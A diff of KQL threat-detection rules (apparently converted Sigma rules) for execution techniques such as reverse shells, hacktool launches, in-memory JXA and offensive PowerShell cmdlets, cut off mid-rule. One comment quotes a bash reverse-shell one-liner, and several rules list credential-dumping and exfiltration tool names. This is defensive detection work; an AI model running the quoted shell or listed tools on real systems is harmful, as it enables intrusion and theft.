b/KQL/rules/Execution/jamf_mdm_potential_suspicious_child_process.kql @@ -1,12 +1,12 @@ -// Title: JAMF MDM Potential Suspicious Child Process -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-08-22 -// Level: medium -// Description: Detects potential suspicious child processes of "jamf". Could be a sign of potential abuse of Jamf as a C2 server as seen by Typhon MythicAgent. -// MITRE Tactic: Execution -// Tags: attack.execution -// False Positives: -// - Legitimate execution of custom scripts or commands by Jamf administrators. Apply additional filters accordingly - -DeviceProcessEvents +// Title: JAMF MDM Potential Suspicious Child Process +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-22 +// Level: medium +// Description: Detects potential suspicious child processes of "jamf". Could be a sign of potential abuse of Jamf as a C2 server as seen by Typhon MythicAgent. +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Legitimate execution of custom scripts or commands by Jamf administrators. Apply additional filters accordingly + +DeviceProcessEvents | where (FolderPath endswith "/bash" or FolderPath endswith "/sh") and InitiatingProcessFolderPath endswith "/jamf" \ No newline at end of file diff --git a/KQL/rules/Execution/java_running_with_remote_debugging.kql b/KQL/rules/Execution/java_running_with_remote_debugging.kql index c15627fc..adc88d42 100644 --- a/KQL/rules/Execution/java_running_with_remote_debugging.kql +++ b/KQL/rules/Execution/java_running_with_remote_debugging.kql @@ -1,10 +1,10 @@ -// Title: Java Running with Remote Debugging -// Author: Florian Roth (Nextron Systems) -// Date: 2019-01-16 -// Level: medium -// Description: Detects a JAVA process running with remote debugging allowing more than just localhost to connect -// MITRE Tactic: Execution -// Tags: attack.t1203, attack.execution - -DeviceProcessEvents +// Title: Java Running with Remote Debugging +// Author: Florian Roth (Nextron Systems) +// Date: 2019-01-16 +// Level: medium +// Description: Detects a JAVA process running with remote debugging allowing more than just localhost to connect +// MITRE Tactic: Execution +// Tags: attack.t1203, attack.execution + +DeviceProcessEvents | where (ProcessCommandLine contains "transport=dt_socket,address=" and (ProcessCommandLine contains "jre1." or ProcessCommandLine contains "jdk1.")) and (not((ProcessCommandLine contains "address=127.0.0.1" or ProcessCommandLine contains "address=localhost"))) \ No newline at end of file diff --git a/KQL/rules/Execution/jxa_in_memory_execution_via_osascript.kql b/KQL/rules/Execution/jxa_in_memory_execution_via_osascript.kql index 12d4123c..7db1cc23 100644 --- a/KQL/rules/Execution/jxa_in_memory_execution_via_osascript.kql +++ b/KQL/rules/Execution/jxa_in_memory_execution_via_osascript.kql @@ -1,10 +1,10 @@ -// Title: JXA In-memory Execution Via OSAScript -// Author: Sohan G (D4rkCiph3r) -// Date: 2023-01-31 -// Level: high -// Description: Detects possible malicious execution of JXA in-memory via OSAScript -// MITRE Tactic: Execution -// Tags: attack.t1059.002, attack.t1059.007, attack.execution - -DeviceProcessEvents +// Title: JXA In-memory Execution Via OSAScript +// Author: Sohan G (D4rkCiph3r) +// Date: 2023-01-31 +// Level: high +// Description: Detects possible malicious execution of JXA in-memory via OSAScript +// MITRE Tactic: Execution +// Tags: attack.t1059.002, attack.t1059.007, attack.execution + +DeviceProcessEvents | where ((ProcessCommandLine contains " -l " and ProcessCommandLine contains "JavaScript") or ProcessCommandLine contains ".js") and (ProcessCommandLine contains "osascript" and ProcessCommandLine contains " -e " and ProcessCommandLine contains "eval" and ProcessCommandLine contains "NSData.dataWithContentsOfURL") \ No newline at end of file diff --git a/KQL/rules/Execution/kaspersky_endpoint_security_stopped_via_commandline_linux.kql b/KQL/rules/Execution/kaspersky_endpoint_security_stopped_via_commandline_linux.kql index f592267e..c4919eb8 100644 --- a/KQL/rules/Execution/kaspersky_endpoint_security_stopped_via_commandline_linux.kql +++ b/KQL/rules/Execution/kaspersky_endpoint_security_stopped_via_commandline_linux.kql @@ -1,13 +1,13 @@ -// Title: Kaspersky Endpoint Security Stopped Via CommandLine - Linux -// Author: Milad Cheraghi -// Date: 2025-10-18 -// Level: high -// Description: Detects execution of the Kaspersky init.d stop script on Linux systems either directly or via systemctl. -// This activity may indicate a manual interruption of the antivirus service by an administrator, or it could be a sign of potential tampering or evasion attempts by malicious actors. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.t1562.001 -// False Positives: -// - System administrator manually stopping Kaspersky services - -DeviceProcessEvents +// Title: Kaspersky Endpoint Security Stopped Via CommandLine - Linux +// Author: Milad Cheraghi +// Date: 2025-10-18 +// Level: high +// Description: Detects execution of the Kaspersky init.d stop script on Linux systems either directly or via systemctl. +// This activity may indicate a manual interruption of the antivirus service by an administrator, or it could be a sign of potential tampering or evasion attempts by malicious actors. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1562.001 +// False Positives: +// - System administrator manually stopping Kaspersky services + +DeviceProcessEvents | where (ProcessCommandLine contains "stop" and ProcessCommandLine contains "kesl") and (FolderPath endswith "/systemctl" or FolderPath endswith "/bash" or FolderPath endswith "/sh") \ No newline at end of file diff --git a/KQL/rules/Execution/linux_hacktool_execution.kql b/KQL/rules/Execution/linux_hacktool_execution.kql index f8b705fa..4a14b737 100644 --- a/KQL/rules/Execution/linux_hacktool_execution.kql +++ b/KQL/rules/Execution/linux_hacktool_execution.kql @@ -1,12 +1,12 @@ -// Title: Linux HackTool Execution -// Author: Nasreddine Bencherchali (Nextron Systems), Georg Lauenstein (sure[secure]) -// Date: 2023-01-03 -// Level: high -// Description: Detects known hacktool execution based on image name. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.resource-development, attack.t1587 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Linux HackTool Execution +// Author: Nasreddine Bencherchali (Nextron Systems), Georg Lauenstein (sure[secure]) +// Date: 2023-01-03 +// Level: high +// Description: Detects known hacktool execution based on image name. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.resource-development, attack.t1587 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (FolderPath contains "/cobaltstrike" or FolderPath contains "/teamserver") or (FolderPath endswith "/crackmapexec" or FolderPath endswith "/havoc" or FolderPath endswith "/merlin-agent" or FolderPath endswith "/merlinServer-Linux-x64" or FolderPath endswith "/msfconsole" or FolderPath endswith "/msfvenom" or FolderPath endswith "/ps-empire server" or FolderPath endswith "/ps-empire" or FolderPath endswith "/sliver-client" or FolderPath endswith "/sliver-server" or FolderPath endswith "/Villain.py") or (FolderPath endswith "/aircrack-ng" or FolderPath endswith "/bloodhound-python" or FolderPath endswith "/bpfdos" or FolderPath endswith "/ebpfki" or FolderPath endswith "/evil-winrm" or FolderPath endswith "/hashcat" or FolderPath endswith "/hoaxshell.py" or FolderPath endswith "/hydra" or FolderPath endswith "/john" or FolderPath endswith "/ncrack" or FolderPath endswith "/nxc-ubuntu-latest" or FolderPath endswith "/pidhide" or FolderPath endswith "/pspy32" or FolderPath endswith "/pspy32s" or FolderPath endswith "/pspy64" or FolderPath endswith "/pspy64s" or FolderPath endswith "/setoolkit" or FolderPath endswith "/sqlmap" or FolderPath endswith "/writeblocker") or FolderPath contains "/linpeas" or (FolderPath endswith "/autorecon" or FolderPath endswith "/httpx" or FolderPath endswith "/legion" or FolderPath endswith "/naabu" or FolderPath endswith "/netdiscover" or FolderPath endswith "/nuclei" or FolderPath endswith "/recon-ng") or FolderPath contains "/sniper" or (FolderPath endswith "/dirb" or FolderPath endswith "/dirbuster" or FolderPath endswith "/eyewitness" or FolderPath endswith "/feroxbuster" or FolderPath endswith "/ffuf" or FolderPath endswith "/gobuster" or FolderPath endswith "/wfuzz" or FolderPath endswith "/whatweb") or (FolderPath endswith "/joomscan" or FolderPath endswith "/nikto" or FolderPath endswith "/wpscan") \ No newline at end of file diff --git a/KQL/rules/Execution/linux_reverse_shell_indicator.kql b/KQL/rules/Execution/linux_reverse_shell_indicator.kql index e5fc34bb..d8967000 100644 --- a/KQL/rules/Execution/linux_reverse_shell_indicator.kql +++ b/KQL/rules/Execution/linux_reverse_shell_indicator.kql @@ -1,10 +1,10 @@ -// Title: Linux Reverse Shell Indicator -// Author: Florian Roth (Nextron Systems) -// Date: 2021-10-16 -// Level: critical -// Description: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1') -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.004 - -DeviceNetworkEvents +// Title: Linux Reverse Shell Indicator +// Author: Florian Roth (Nextron Systems) +// Date: 2021-10-16 +// Level: critical +// Description: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1') +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.004 + +DeviceNetworkEvents | where InitiatingProcessFolderPath endswith "/bin/bash" and (not((RemoteIP in~ ("127.0.0.1", "0.0.0.0")))) \ No newline at end of file diff --git a/KQL/rules/Execution/local_file_read_using_curl_exe.kql b/KQL/rules/Execution/local_file_read_using_curl_exe.kql index 3c3dfdb4..beab6efb 100644 --- a/KQL/rules/Execution/local_file_read_using_curl_exe.kql +++ b/KQL/rules/Execution/local_file_read_using_curl_exe.kql @@ -1,10 +1,10 @@ -// Title: Local File Read Using Curl.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-07-27 -// Level: medium -// Description: Detects execution of "curl.exe" with the "file://" protocol handler in order to read local files. -// MITRE Tactic: Execution -// Tags: attack.execution - -DeviceProcessEvents +// Title: Local File Read Using Curl.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-07-27 +// Level: medium +// Description: Detects execution of "curl.exe" with the "file://" protocol handler in order to read local files. +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents | where ProcessCommandLine contains "file:///" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/logged_on_user_password_change_via_ksetup_exe.kql b/KQL/rules/Execution/logged_on_user_password_change_via_ksetup_exe.kql index 2f25ae74..5349e8a2 100644 --- a/KQL/rules/Execution/logged_on_user_password_change_via_ksetup_exe.kql +++ b/KQL/rules/Execution/logged_on_user_password_change_via_ksetup_exe.kql @@ -1,10 +1,10 @@ -// Title: Logged-On User Password Change Via Ksetup.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-04-06 -// Level: medium -// Description: Detects password change for the logged-on user's via "ksetup.exe" -// MITRE Tactic: Execution -// Tags: attack.execution - -DeviceProcessEvents +// Title: Logged-On User Password Change Via Ksetup.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-06 +// Level: medium +// Description: Detects password change for the logged-on user's via "ksetup.exe" +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents | where ProcessCommandLine contains " /ChangePassword " and (FolderPath endswith "\\ksetup.exe" or ProcessVersionInfoOriginalFileName =~ "ksetup.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/macos_scripting_interpreter_applescript.kql b/KQL/rules/Execution/macos_scripting_interpreter_applescript.kql index ef949b8f..9a99227f 100644 --- a/KQL/rules/Execution/macos_scripting_interpreter_applescript.kql +++ b/KQL/rules/Execution/macos_scripting_interpreter_applescript.kql @@ -1,12 +1,12 @@ -// Title: MacOS Scripting Interpreter AppleScript -// Author: Alejandro Ortuno, oscd.community -// Date: 2020-10-21 -// Level: medium -// Description: Detects execution of AppleScript of the macOS scripting language AppleScript. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.002 -// False Positives: -// - Application installers might contain scripts as part of the installation process. - -DeviceProcessEvents +// Title: MacOS Scripting Interpreter AppleScript +// Author: Alejandro Ortuno, oscd.community +// Date: 2020-10-21 +// Level: medium +// Description: Detects execution of AppleScript of the macOS scripting language AppleScript. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.002 +// False Positives: +// - Application installers might contain scripts as part of the installation process. + +DeviceProcessEvents | where (ProcessCommandLine contains " -e " or ProcessCommandLine contains ".scpt" or ProcessCommandLine contains ".js") and FolderPath endswith "/osascript" \ No newline at end of file diff --git a/KQL/rules/Execution/malicious_base64_encoded_powershell_keywords_in_command_lines.kql b/KQL/rules/Execution/malicious_base64_encoded_powershell_keywords_in_command_lines.kql index 37f72b9e..faad903c 100644 --- a/KQL/rules/Execution/malicious_base64_encoded_powershell_keywords_in_command_lines.kql +++ b/KQL/rules/Execution/malicious_base64_encoded_powershell_keywords_in_command_lines.kql @@ -1,10 +1,10 @@ -// Title: Malicious Base64 Encoded PowerShell Keywords in Command Lines -// Author: John Lambert (rule) -// Date: 2019-01-16 -// Level: high -// Description: Detects base64 encoded strings used in hidden malicious PowerShell command lines -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001 - -DeviceProcessEvents +// Title: Malicious Base64 Encoded PowerShell Keywords in Command Lines +// Author: John Lambert (rule) +// Date: 2019-01-16 +// Level: high +// Description: Detects base64 encoded strings used in hidden malicious PowerShell command lines +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 + +DeviceProcessEvents | where (ProcessCommandLine contains "AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA" or ProcessCommandLine contains "aXRzYWRtaW4gL3RyYW5zZmVy" or ProcessCommandLine contains "IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA" or ProcessCommandLine contains "JpdHNhZG1pbiAvdHJhbnNmZX" or ProcessCommandLine contains "YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg" or ProcessCommandLine contains "Yml0c2FkbWluIC90cmFuc2Zlc" or ProcessCommandLine contains "AGMAaAB1AG4AawBfAHMAaQB6AGUA" or ProcessCommandLine contains "JABjAGgAdQBuAGsAXwBzAGkAegBlA" or ProcessCommandLine contains "JGNodW5rX3Npem" or ProcessCommandLine contains "QAYwBoAHUAbgBrAF8AcwBpAHoAZQ" or ProcessCommandLine contains "RjaHVua19zaXpl" or ProcessCommandLine contains "Y2h1bmtfc2l6Z" or ProcessCommandLine contains "AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A" or ProcessCommandLine contains "kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg" or ProcessCommandLine contains "lPLkNvbXByZXNzaW9u" or ProcessCommandLine contains "SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA" or ProcessCommandLine contains "SU8uQ29tcHJlc3Npb2" or ProcessCommandLine contains "Ty5Db21wcmVzc2lvb" or ProcessCommandLine contains "AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ" or ProcessCommandLine contains "kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA" or ProcessCommandLine contains "lPLk1lbW9yeVN0cmVhb" or ProcessCommandLine contains "SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A" or ProcessCommandLine contains "SU8uTWVtb3J5U3RyZWFt" or ProcessCommandLine contains "Ty5NZW1vcnlTdHJlYW" or ProcessCommandLine contains "4ARwBlAHQAQwBoAHUAbgBrA" or ProcessCommandLine contains "5HZXRDaHVua" or ProcessCommandLine contains "AEcAZQB0AEMAaAB1AG4Aaw" or ProcessCommandLine contains "LgBHAGUAdABDAGgAdQBuAGsA" or ProcessCommandLine contains "LkdldENodW5r" or ProcessCommandLine contains "R2V0Q2h1bm" or ProcessCommandLine contains "AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A" or ProcessCommandLine contains "QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA" or ProcessCommandLine contains "RIUkVBRF9JTkZPNj" or ProcessCommandLine contains "SFJFQURfSU5GTzY0" or ProcessCommandLine contains "VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA" or ProcessCommandLine contains "VEhSRUFEX0lORk82N" or ProcessCommandLine contains "AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA" or ProcessCommandLine contains "cmVhdGVSZW1vdGVUaHJlYW" or ProcessCommandLine contains "MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA" or ProcessCommandLine contains "NyZWF0ZVJlbW90ZVRocmVhZ" or ProcessCommandLine contains "Q3JlYXRlUmVtb3RlVGhyZWFk" or ProcessCommandLine contains "QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA" or ProcessCommandLine contains "0AZQBtAG0AbwB2AGUA" or ProcessCommandLine contains "1lbW1vdm" or ProcessCommandLine contains "AGUAbQBtAG8AdgBlA" or ProcessCommandLine contains "bQBlAG0AbQBvAHYAZQ" or ProcessCommandLine contains "bWVtbW92Z" or ProcessCommandLine contains "ZW1tb3Zl") and ProcessCommandLine contains " hidden " and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/Execution/malicious_powershell_commandlets_processcreation.kql b/KQL/rules/Execution/malicious_powershell_commandlets_processcreation.kql index ae7cddf5..a8fe0a43 100644 --- a/KQL/rules/Execution/malicious_powershell_commandlets_processcreation.kql +++ b/KQL/rules/Execution/malicious_powershell_commandlets_processcreation.kql @@ -1,10 +1,10 @@ -// Title: Malicious PowerShell Commandlets - ProcessCreation -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-01-02 -// Level: high -// Description: Detects Commandlet names from well-known PowerShell exploitation frameworks -// MITRE Tactic: Execution -// Tags: attack.execution, attack.discovery, attack.t1482, attack.t1087, attack.t1087.001, attack.t1087.002, attack.t1069.001, attack.t1069.002, attack.t1069, attack.t1059.001 - -DeviceProcessEvents +// Title: Malicious PowerShell Commandlets - ProcessCreation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-02 +// Level: high +// Description: Detects Commandlet names from well-known PowerShell exploitation frameworks +// MITRE Tactic: Execution +// Tags: attack.execution, attack.discovery, attack.t1482, attack.t1087, attack.t1087.001, attack.t1087.002, attack.t1069.001, attack.t1069.002, attack.t1069, attack.t1059.001 + +DeviceProcessEvents | where ProcessCommandLine contains "Add-Exfiltration" or ProcessCommandLine contains "Add-Persistence" or ProcessCommandLine contains "Add-RegBackdoor" or ProcessCommandLine contains "Add-RemoteRegBackdoor" or ProcessCommandLine contains "Add-ScrnSaveBackdoor" or ProcessCommandLine contains "Check-VM" or ProcessCommandLine contains "ConvertTo-Rc4ByteStream" or ProcessCommandLine contains "Decrypt-Hash" or ProcessCommandLine contains "Disable-ADIDNSNode" or ProcessCommandLine contains "Disable-MachineAccount" or ProcessCommandLine contains "Do-Exfiltration" or ProcessCommandLine contains "Enable-ADIDNSNode" or ProcessCommandLine contains "Enable-MachineAccount" or ProcessCommandLine contains "Enabled-DuplicateToken" or ProcessCommandLine contains "Exploit-Jboss" or ProcessCommandLine contains "Export-ADR" or ProcessCommandLine contains "Export-ADRCSV" or ProcessCommandLine contains "Export-ADRExcel" or ProcessCommandLine contains "Export-ADRHTML" or ProcessCommandLine contains "Export-ADRJSON" or ProcessCommandLine contains "Export-ADRXML" or ProcessCommandLine contains "Find-Fruit" or ProcessCommandLine contains "Find-GPOLocation" or ProcessCommandLine contains "Find-TrustedDocuments" or ProcessCommandLine contains "Get-ADIDNS" or ProcessCommandLine contains "Get-ApplicationHost" or ProcessCommandLine contains "Get-ChromeDump" or ProcessCommandLine contains "Get-ClipboardContents" or ProcessCommandLine contains "Get-FoxDump" or ProcessCommandLine contains "Get-GPPPassword" or ProcessCommandLine contains "Get-IndexedItem" or ProcessCommandLine contains "Get-KerberosAESKey" or ProcessCommandLine contains "Get-Keystrokes" or ProcessCommandLine contains "Get-LSASecret" or ProcessCommandLine contains "Get-MachineAccountAttribute" or ProcessCommandLine contains "Get-MachineAccountCreator" or ProcessCommandLine contains "Get-PassHashes" or ProcessCommandLine contains "Get-RegAlwaysInstallElevated" or ProcessCommandLine contains "Get-RegAutoLogon" or ProcessCommandLine contains "Get-RemoteBootKey" or ProcessCommandLine contains "Get-RemoteCachedCredential" or ProcessCommandLine contains "Get-RemoteLocalAccountHash" or ProcessCommandLine contains "Get-RemoteLSAKey" or ProcessCommandLine contains "Get-RemoteMachineAccountHash" or ProcessCommandLine contains "Get-RemoteNLKMKey" or ProcessCommandLine contains "Get-RickAstley" or ProcessCommandLine contains "Get-Screenshot" or ProcessCommandLine contains "Get-SecurityPackages" or ProcessCommandLine contains "Get-ServiceFilePermission" or ProcessCommandLine contains "Get-ServicePermission" or ProcessCommandLine contains "Get-ServiceUnquoted" or ProcessCommandLine contains "Get-SiteListPassword" or ProcessCommandLine contains "Get-System" or ProcessCommandLine contains "Get-TimedScreenshot" or ProcessCommandLine contains "Get-UnattendedInstallFile" or ProcessCommandLine contains "Get-Unconstrained" or ProcessCommandLine contains "Get-USBKeystrokes" or ProcessCommandLine contains "Get-VaultCredential" or ProcessCommandLine contains "Get-VulnAutoRun" or ProcessCommandLine contains "Get-VulnSchTask" or ProcessCommandLine contains "Grant-ADIDNSPermission" or ProcessCommandLine contains "Gupt-Backdoor" or ProcessCommandLine contains "HTTP-Login" or ProcessCommandLine contains "Install-ServiceBinary" or ProcessCommandLine contains "Install-SSP" or ProcessCommandLine contains "Invoke-ACLScanner" or ProcessCommandLine contains "Invoke-ADRecon" or ProcessCommandLine contains "Invoke-ADSBackdoor" or ProcessCommandLine contains "Invoke-AgentSmith" or ProcessCommandLine contains "Invoke-AllChecks" or ProcessCommandLine contains "Invoke-ARPScan" or ProcessCommandLine contains "Invoke-AzureHound" or ProcessCommandLine contains "Invoke-BackdoorLNK" or ProcessCommandLine contains "Invoke-BadPotato" or ProcessCommandLine contains "Invoke-BetterSafetyKatz" or ProcessCommandLine contains "Invoke-BypassUAC" or ProcessCommandLine contains "Invoke-Carbuncle" or ProcessCommandLine contains "Invoke-Certify" or ProcessCommandLine contains "Invoke-ConPtyShell" or ProcessCommandLine contains "Invoke-CredentialInjection" or ProcessCommandLine contains "Invoke-DAFT" or ProcessCommandLine contains "Invoke-DCSync" or ProcessCommandLine contains "Invoke-DinvokeKatz" or ProcessCommandLine contains "Invoke-DllInjection" or ProcessCommandLine contains "Invoke-DNSUpdate" or ProcessCommandLine contains "Invoke-DomainPasswordSpray" or ProcessCommandLine contains "Invoke-DowngradeAccount" or ProcessCommandLine contains "Invoke-EgressCheck" or ProcessCommandLine contains "Invoke-Eyewitness" or ProcessCommandLine contains "Invoke-FakeLogonScreen" or ProcessCommandLine contains "Invoke-Farmer" or ProcessCommandLine contains "Invoke-Get-RBCD-Threaded" or ProcessCommandLine contains "Invoke-Gopher" or ProcessCommandLine contains "Invoke-Grouper" or ProcessCommandLine contains "Invoke-HandleKatz" or ProcessCommandLine contains "Invoke-ImpersonatedProcess" or ProcessCommandLine contains "Invoke-ImpersonateSystem" or ProcessCommandLine contains "Invoke-InteractiveSystemPowerShell" or ProcessCommandLine contains "Invoke-Internalmonologue" or ProcessCommandLine contains "Invoke-Inveigh" or ProcessCommandLine contains "Invoke-InveighRelay" or ProcessCommandLine contains "Invoke-KrbRelay" or ProcessCommandLine contains "Invoke-LdapSignCheck" or ProcessCommandLine contains "Invoke-Lockless" or ProcessCommandLine contains "Invoke-MalSCCM" or ProcessCommandLine contains "Invoke-Mimikatz" or ProcessCommandLine contains "Invoke-Mimikittenz" or ProcessCommandLine contains "Invoke-MITM6" or ProcessCommandLine contains "Invoke-NanoDump" or ProcessCommandLine contains "Invoke-NetRipper" or ProcessCommandLine contains "Invoke-Nightmare" or ProcessCommandLine contains "Invoke-NinjaCopy" or ProcessCommandLine contains "Invoke-OfficeScrape" or ProcessCommandLine contains "Invoke-OxidResolver" or ProcessCommandLine contains "Invoke-P0wnedshell" or ProcessCommandLine contains "Invoke-Paranoia" or ProcessCommandLine contains "Invoke-PortScan" or ProcessCommandLine contains "Invoke-PoshRatHttp" or ProcessCommandLine contains "Invoke-PostExfil" or ProcessCommandLine contains "Invoke-PowerDump" or ProcessCommandLine contains "Invoke-PowerDPAPI" or ProcessCommandLine contains "Invoke-PowerShellTCP" or ProcessCommandLine contains "Invoke-PowerShellWMI" or ProcessCommandLine contains "Invoke-PPLDump" or ProcessCommandLine contains "Invoke-PsExec" or ProcessCommandLine contains "Invoke-PSInject" or ProcessCommandLine contains "Invoke-PsUaCme" or ProcessCommandLine contains "Invoke-ReflectivePEInjection" or ProcessCommandLine contains "Invoke-ReverseDNSLookup" or ProcessCommandLine contains "Invoke-Rubeus" or ProcessCommandLine contains "Invoke-RunAs" or ProcessCommandLine contains "Invoke-SafetyKatz" or ProcessCommandLine contains "Invoke-SauronEye" or ProcessCommandLine contains "Invoke-SCShell" or ProcessCommandLine contains "Invoke-Seatbelt" or ProcessCommandLine contains "Invoke-ServiceAbuse" or ProcessCommandLine contains "Invoke-ShadowSpray" or ProcessCommandLine contains "Invoke-Sharp" or ProcessCommandLine contains "Invoke-Shellcode" or ProcessCommandLine contains "Invoke-SMBScanner" or ProcessCommandLine contains "Invoke-Snaffler" or ProcessCommandLine contains "Invoke-Spoolsample" or ProcessCommandLine contains "Invoke-SpraySinglePassword" or ProcessCommandLine contains "Invoke-SSHCommand" or ProcessCommandLine contains "Invoke-StandIn" or ProcessCommandLine contains "Invoke-StickyNotesExtract" or ProcessCommandLine contains "Invoke-SystemCommand" or ProcessCommandLine contains "Invoke-Tasksbackdoor" or ProcessCommandLine contains "Invoke-Tater" or ProcessCommandLine contains "Invoke-Thunderfox" or ProcessCommandLine contains "Invoke-ThunderStruck" or ProcessCommandLine contains "Invoke-TokenManipulation" or ProcessCommandLine contains "Invoke-Tokenvator" or ProcessCommandLine contains "Invoke-TotalExec" or ProcessCommandLine contains "Invoke-UrbanBishop" or ProcessCommandLine contains "Invoke-UserHunter" or ProcessCommandLine contains "Invoke-VoiceTroll" or ProcessCommandLine contains "Invoke-Whisker" or ProcessCommandLine contains "Invoke-WinEnum" or ProcessCommandLine contains "Invoke-winPEAS" or ProcessCommandLine contains "Invoke-WireTap" or ProcessCommandLine contains "Invoke-WmiCommand" or ProcessCommandLine contains "Invoke-WMIExec" or ProcessCommandLine contains "Invoke-WScriptBypassUAC" or ProcessCommandLine contains "Invoke-Zerologon" or ProcessCommandLine contains "MailRaider" or ProcessCommandLine contains "New-ADIDNSNode" or ProcessCommandLine contains "New-DNSRecordArray" or ProcessCommandLine contains "New-HoneyHash" or ProcessCommandLine contains "New-InMemoryModule" or ProcessCommandLine contains "New-MachineAccount" or ProcessCommandLine contains "New-SOASerialNumberArray" or ProcessCommandLine contains "Out-Minidump" or ProcessCommandLine contains "Port-Scan" or ProcessCommandLine contains "PowerBreach" or ProcessCommandLine contains "powercat " or ProcessCommandLine contains "PowerUp" or ProcessCommandLine contains "PowerView" or ProcessCommandLine contains "Remove-ADIDNSNode" or ProcessCommandLine contains "Remove-MachineAccount" or ProcessCommandLine contains "Remove-Update" or ProcessCommandLine contains "Rename-ADIDNSNode" or ProcessCommandLine contains "Revoke-ADIDNSPermission" or ProcessCommandLine contains "Set-ADIDNSNode" or ProcessCommandLine contains "Set-MacAttribute" or ProcessCommandLine contains "Set-MachineAccountAttribute" or ProcessCommandLine contains "Set-Wallpaper" or ProcessCommandLine contains "Show-TargetScreen" or ProcessCommandLine contains "Start-CaptureServer" or ProcessCommandLine contains "Start-Dnscat2" or ProcessCommandLine contains "Start-WebcamRecorder" or ProcessCommandLine contains "Veeam-Get-Creds" or ProcessCommandLine contains "VolumeShadowCopyTools" \ No newline at end of file diff --git a/KQL/rules/Execution/malicious_powershell_scripts_filecreation.kql b/KQL/rules/Execution/malicious_powershell_scripts_filecreation.kql index 4cfbdda0..9b6c558c 100644 --- a/KQL/rules/Execution/malicious_powershell_scripts_filecreation.kql +++ b/KQL/rules/Execution/malicious_powershell_scripts_filecreation.kql @@ -1,10 +1,10 @@ -// Title: Malicious PowerShell Scripts - FileCreation -// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein -// Date: 2018-04-07 -// Level: high -// Description: Detects the creation of known offensive powershell scripts used for exploitation -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001 - -DeviceFileEvents +// Title: Malicious PowerShell Scripts - FileCreation +// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein +// Date: 2018-04-07 +// Level: high +// Description: Detects the creation of known offensive powershell scripts used for exploitation +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 + +DeviceFileEvents | where (FolderPath endswith "\\Add-ConstrainedDelegationBackdoor.ps1" or FolderPath endswith "\\Add-Exfiltration.ps1" or FolderPath endswith "\\Add-Persistence.ps1" or FolderPath endswith "\\Add-RegBackdoor.ps1" or FolderPath endswith "\\Add-RemoteRegBackdoor.ps1" or FolderPath endswith "\\Add-ScrnSaveBackdoor.ps1" or FolderPath endswith "\\ADRecon.ps1" or FolderPath endswith "\\AzureADRecon.ps1" or FolderPath endswith "\\BadSuccessor.ps1" or FolderPath endswith "\\Check-VM.ps1" or FolderPath endswith "\\ConvertTo-ROT13.ps1" or FolderPath endswith "\\Copy-VSS.ps1" or FolderPath endswith "\\Create-MultipleSessions.ps1" or FolderPath endswith "\\DNS_TXT_Pwnage.ps1" or FolderPath endswith "\\dnscat2.ps1" or FolderPath endswith "\\Do-Exfiltration.ps1" or FolderPath endswith "\\DomainPasswordSpray.ps1" or FolderPath endswith "\\Download_Execute.ps1" or FolderPath endswith "\\Download-Execute-PS.ps1" or FolderPath endswith "\\Enable-DuplicateToken.ps1" or FolderPath endswith "\\Enabled-DuplicateToken.ps1" or FolderPath endswith "\\Execute-Command-MSSQL.ps1" or FolderPath endswith 